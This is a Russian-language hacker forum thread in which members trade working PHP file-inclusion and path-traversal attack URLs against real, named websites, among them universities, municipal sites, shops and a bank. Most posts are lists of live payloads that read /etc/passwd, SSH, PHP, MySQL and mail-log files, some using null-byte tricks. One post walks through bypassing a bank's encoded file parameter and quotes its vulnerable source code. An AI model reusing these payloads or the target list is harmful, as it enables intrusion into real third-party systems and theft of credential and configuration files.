PHP Иньекции

Discussion in 'Уязвимости' started by Joker-jar, 20 Apr 2007.

  1. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    [PR 6]
    Code:
    http://web.ce.metu.edu.tr/index.php?id=../../../index
    [PR 6]
    Code:
    http://www.ipp.mesi.ru/edu/index.php?id=index
     
  2. Fata1ex

    Fata1ex Elder - Старейшина

    Joined:
    12 Dec 2006
    Messages:
    703
    Likes Received:
    300
    Reputations:
    38
    Code:
    http://www.motormania.hr/index.php?forwardUrl=../../../../../etc/passwd
    :(
     
  3. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    :)
    Safe mode :(
     
  4. schwarze

    schwarze Member

    Joined:
    1 Dec 2008
    Messages:
    64
    Likes Received:
    38
    Reputations:
    5
    Code:
    http://www.mumost.cz/informace/index.htm?fr2=../../../
    и тд и тп)
     
  5. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    [PR 6]
    Code:
    http://www.piedmont.edu/index.php?id=../index.php%00
     
  6. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.townofmamaroneck.org/cms/view.cgi?file=../../../../../../../../../../../../etc/passwd%00
    http://www.townofmamaroneck.org/cms/view.cgi?file=../../../../../../../../../../../../etc/ssh/sshd_config%00
    http://www.townofmamaroneck.org/cms/view.cgi?file=../../../../../../../../../../../../etc/httpd.conf%00
    http://www.townofmamaroneck.org/cms/view.cgi?file=../../../../../../../../../../../../usr/ports/ftp/pure-ftpd/%00
    http://www.townofmamaroneck.org/cms/view.cgi?file=../../../../../../../../../../../../var/log/maillog%00
    
    -----------------------------
    http://www.gazovik.tyumen.ru/cgi-bin/view.cgi?file=../../../../../../../../../../../etc/passwd%00
    http://www.gazovik.tyumen.ru/cgi-bin/view.cgi?file=../../../../../../../../../../../etc/php.ini%00
    http://www.gazovik.tyumen.ru/cgi-bin/view.cgi?file=../../../../../../../../../../../etc/my.cnf%00
    
    
    -----------------------------
    http://mall.usashopper.com/view.cgi?file=../../../../../../../../../../../../../../etc/passwd%00
    http://mall.usashopper.com/view.cgi?file=../../../../../../../../../../../../../../etc/ssh/sshd_config%00
    http://mall.usashopper.com/view.cgi?file=../../../../../../../../../../../../../../var/log/xferlog%00
    http://mall.usashopper.com/view.cgi?file=../../../../../../../../../../../../../../usr/ports/ftp/pure-ftpd/%00
    
    
    -----------------------------
    http://www.biblestudytools.com/History/AD/EarlyChurchFathers/Ante-Nicene/Origen/view.cgi?file=../../../../../../../../../../../../../../etc/passwd
    
     
  7. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.embavenez-us.org/index.php/function.include?pagina=../../../../../../../../../../../../../../etc/passwd
    
    ----------------------------- fuck owner:)
    http://annamusic.ru/index.php?inc=../../../../../../../../../../../../../../etc/passwd - тут грязно ругается почему-то
    http://annamusic.ru/index.php?inc=../../../../../../../../../../../../../../etc/passwd%00
    http://annamusic.ru/index.php?inc=../../../../../../../../../../../../../../etc/ssh/sshd_config%00
    
     
    1 person likes this.
  8. _>SubDeviL<_

    _>SubDeviL<_ Elder - Старейшина

    Joined:
    22 Jun 2008
    Messages:
    24
    Likes Received:
    3
    Reputations:
    0
    Code:
    http://dtv.horizont.by/index.php?id=../../../../../../etc/passwd
    вродь немало там хостится..
     
  9. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    Code:
    http://www.spaziopetardo.it/letterit2/inc/wysiwyg.php?language=../../../../../../../../../../../../../etc/passwd%00
    http://www.classicbattletech.com/index.php?action=../../../../../../../../../../../../../etc/passwd%00
    http://highwaycompanions.com/index.php?module=../../../../../../../../../../../../../etc/passwd%00
    http://www.velvetrevolver.com/index.php?module=../../../../../../../../../../../../../etc/passwd%00
    http://www.everestkc.net/index.php?module=../../../../../../../../../../../../../etc/passwd%00
     
  10. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    Ещё партеечка ;)

    Code:
    http://www.cityteam.org/news/index.php?c=../../../../../../../../../../../../../etc/passwd%00
    http://www.santana-aschaffenburg.de/index.php?c=../../../../../../../../../../../../../etc/passwd%00
    http://www.tanzi.jp/passwiki/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00
    http://wiki.colortent.com/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00
    http://ja7nwi.ddo.jp/passwiki/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00
    http://www.savvycircle.com/page.php?page=../../../../../../../../../../../../../etc/passwd%00
    http://www.oralabs.com/index.php?module=../../../../../../../../../../../../../etc/passwd%00
    http://rubistar.4teachers.org/index.php?module=../../../../../../../../../../../../../etc/passwd%00
    http://hibbingcurling.com/letterit2/inc/wysiwyg.php?language=../../../../../../../../../../../../../etc/passwd%00
    http://accessnorth.net/letterit2/inc/wysiwyg.php?language=../../../../../../../../../../../../../etc/passwd%00
    http://www.accessnorth.net/letterit/inc/wysiwyg.php?language=../../../../../../../../../../../../../etc/passwd%00
    http://www.hamptonct.com/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
    http://www.barapp.com/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
    http://www.ninabonos.com/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
    http://www.taylortaylorlondon.com/cgi-bin/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
    http://www.math.umd.edu/~dcarrera/bsm/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
    http://www.carey.wa.edu.au/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
    http://remerge.sourceforge.net/cgi-bin/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
    http://melissaphillippe.com/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
    http://www.monkeyircd.org/cgi-bin/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
    http://nakabayashi-kensetsu.co.jp/recruit/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
    http://www.solumandherbe.com/index.cgi/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
    http://careers.eaglesold.com/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
    http://www.californiafleurish.com/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
    http://ultrateq-digital.co.uk/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
    http://www.studionouveau.com/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
    http://freeresalerights.lescigales.org/?page=../../../../../../../../../../../../../etc/passwd%00qwe123
    
    антибоян - google
     
    1 person likes this.
  11. ilinsky

    ilinsky New Member

    Joined:
    21 Sep 2008
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    Директория

    http://doska42.ru/index.php?rub=news&page=../../../../../../../etc/

    Файл в ней

    http://doska42.ru/index.php?rub=newspod&rubnews=../../../../../../../../../..&page=FILENAME
     
  12. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    Банка,
    multibanka.com

    Берёт файл, например:

    Code:
    http://www.multibanka.com/get_file.php?ext=pdf&q=c3VyL25vaXRhY2lscHBhL3N0bmVtdWNvZC9zZWxpZl9kZWRhb2xwdT1odGFwX2VsaWY7ZmRwLnVyXzcwMDJfc3Rza2FyYXNfdXRzbGF2XzI9ZW1hbl9lbGlm
    Base64!
    Декодируем:

    Code:
    sur/noitacilppa/stnemucod/selif_dedaolpu=htap_elif;fdp.ur_7002_stskaras_utslav_2=eman_elif
    ^_^

    Code:
    file_name=2_valstu_saraksts_2007_ru.pdf;file_path= rus/application/documents/selif_dedaopu
    Делаем по умному /etc/passwd

    Code:
    /cte/=htap_elif;dwssap=eman_elif
    И берём его :)

    Code:
    http://www.multibanka.com/get_file.php?ext=pdf&q=L2N0ZS89aHRhcF9lbGlmO2R3c3NhcD1lbWFuX2VsaWY=
    такая вот шн*га.

    P.S:

    get_file.php

    PHP:

        
    include "include_php/my_encoder.php";
        

        
    decode_str$_GET['q'] );
        
    $file_type explode('.',$_GET['file_name']);
        
    $file_type end($file_type);
         if(
    strtolower($file_type)=='pdf')
            
    header('Content-type: application/pdf');
        
    //print_r($_GET);
        
    header("Content-Description: File Transfer");
         
    header("Content-Disposition: attachment; filename="$_GET['file_name']);
        
    header("Content-Transfer-Encoding:  binary");
        
    header("Content-Type: application/download");
        
    header("Accept-Ranges: bytes");
        
    header("Content-Length: "filesize($_GET['file_path']."/".$_GET['file_name']));

            
      
                        
    $file $_GET['file_path']."/".$_GET['file_name'];                    
                        
    $filename fopen($file,"r");
                        
    $data fread($filenamefilesize($file));
                        
    fclose($filename);

                        echo 
    $data;

    my_encoder.php

    PHP:

        
    function encode_str($string) {        
            return 
    base64_encode(strrev($string));
        }


        function 
    decode_str($string) {
            
    $result strrev(base64_decode($string));

                
    // SQL injection tests

                    
    if ((eregi("SELECT"$s)) || (eregi("select"$result)) || (eregi("UNION"$result)) || (eregi("union"$result))) {
                        
    Header("Location: http://www.bs.lv/track_hacker.php");
                    }

                
    $tmp_arr=split(";",$result);

                for ( 
    $i=0$i<=sizeof($tmp_arr); $i++ ) {
                    
    $ta split("=",$tmp_arr[$i]);

                    if (
    $ta['0']) {
                        
    $_GET[$ta['0']] = $ta['1'];
                    }
                }
            
        }

     
    2 people like this.
  13. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    http://www.lastminute-music.com/index.php?inc=/etc/passwd


    http://www.pubs.org.au/index.php?inc=/etc/passwd
     
    1 person likes this.
  14. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    тИЦ: 50
    PR: 4

    RFI
    Code:
    http://www.bloodfmba.ru/news/mir.php?id=RFI
     
    #934 mailbrush, 3 Aug 2009
    Last edited by a moderator: 3 Aug 2009
  15. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Локальный инклюд.
    До /etc/passwd несмог пробраться, на хостинге фильтр.

    локальный инклюд.
    что то ненашёл /etc/passwd

    Такая же беда :(
     
    #935 Ctacok, 5 Aug 2009
    Last edited: 5 Aug 2009
  16. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    PR4

    LFI

    Code:
    http://www.akademiaurody.com/index.php?id=[LFI]
     
  17. FireFenix

    FireFenix Elder - Старейшина

    Joined:
    3 Jun 2009
    Messages:
    390
    Likes Received:
    115
    Reputations:
    23
    LFI

    тИЦ 240
    PR 5/10
    Code:
    http://www.tnpu.edu.ua/php1/index.php?page=../../../../../../etc/passwd
     
  18. FireFenix

    FireFenix Elder - Старейшина

    Joined:
    3 Jun 2009
    Messages:
    390
    Likes Received:
    115
    Reputations:
    23
    На форуме нашёл тока sql-inj к сайту, поэтому выложу php-inj

    LFI
    Code:
    http://www.uvm.edu/student_life/?Page=../phpinfo.php
     
  19. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    ну и от меня кусочек

    HTML:
    http://www.lauralee.com/index.cgi?page=../../../../../../../etc/passwd%00
    HTML:
    http://www.cats-online.ru/index.cgi?state=article_phsycology&page=../../../../../../../etc/passwd%00
    HTML:
    http://www.phathack.com/index.cgi?page=../../../../../../../../../../../../../../etc/passwd%00
    HTML:
    http://www.concordalliance.org/index.cgi?page=../../../../../../../../../../../../../../../../../../etc/passwd%00
     
    _________________________
    #939 Uex Urgent, 7 Aug 2009
    Last edited: 7 Aug 2009
  20. +++AndreyDevil+++

    Joined:
    28 Dec 2008
    Messages:
    117
    Likes Received:
    30
    Reputations:
    0
    http://www.menlo.edu/library/courses/courses.php?course=../../../../../../etc/passwd
     
    1 person likes this.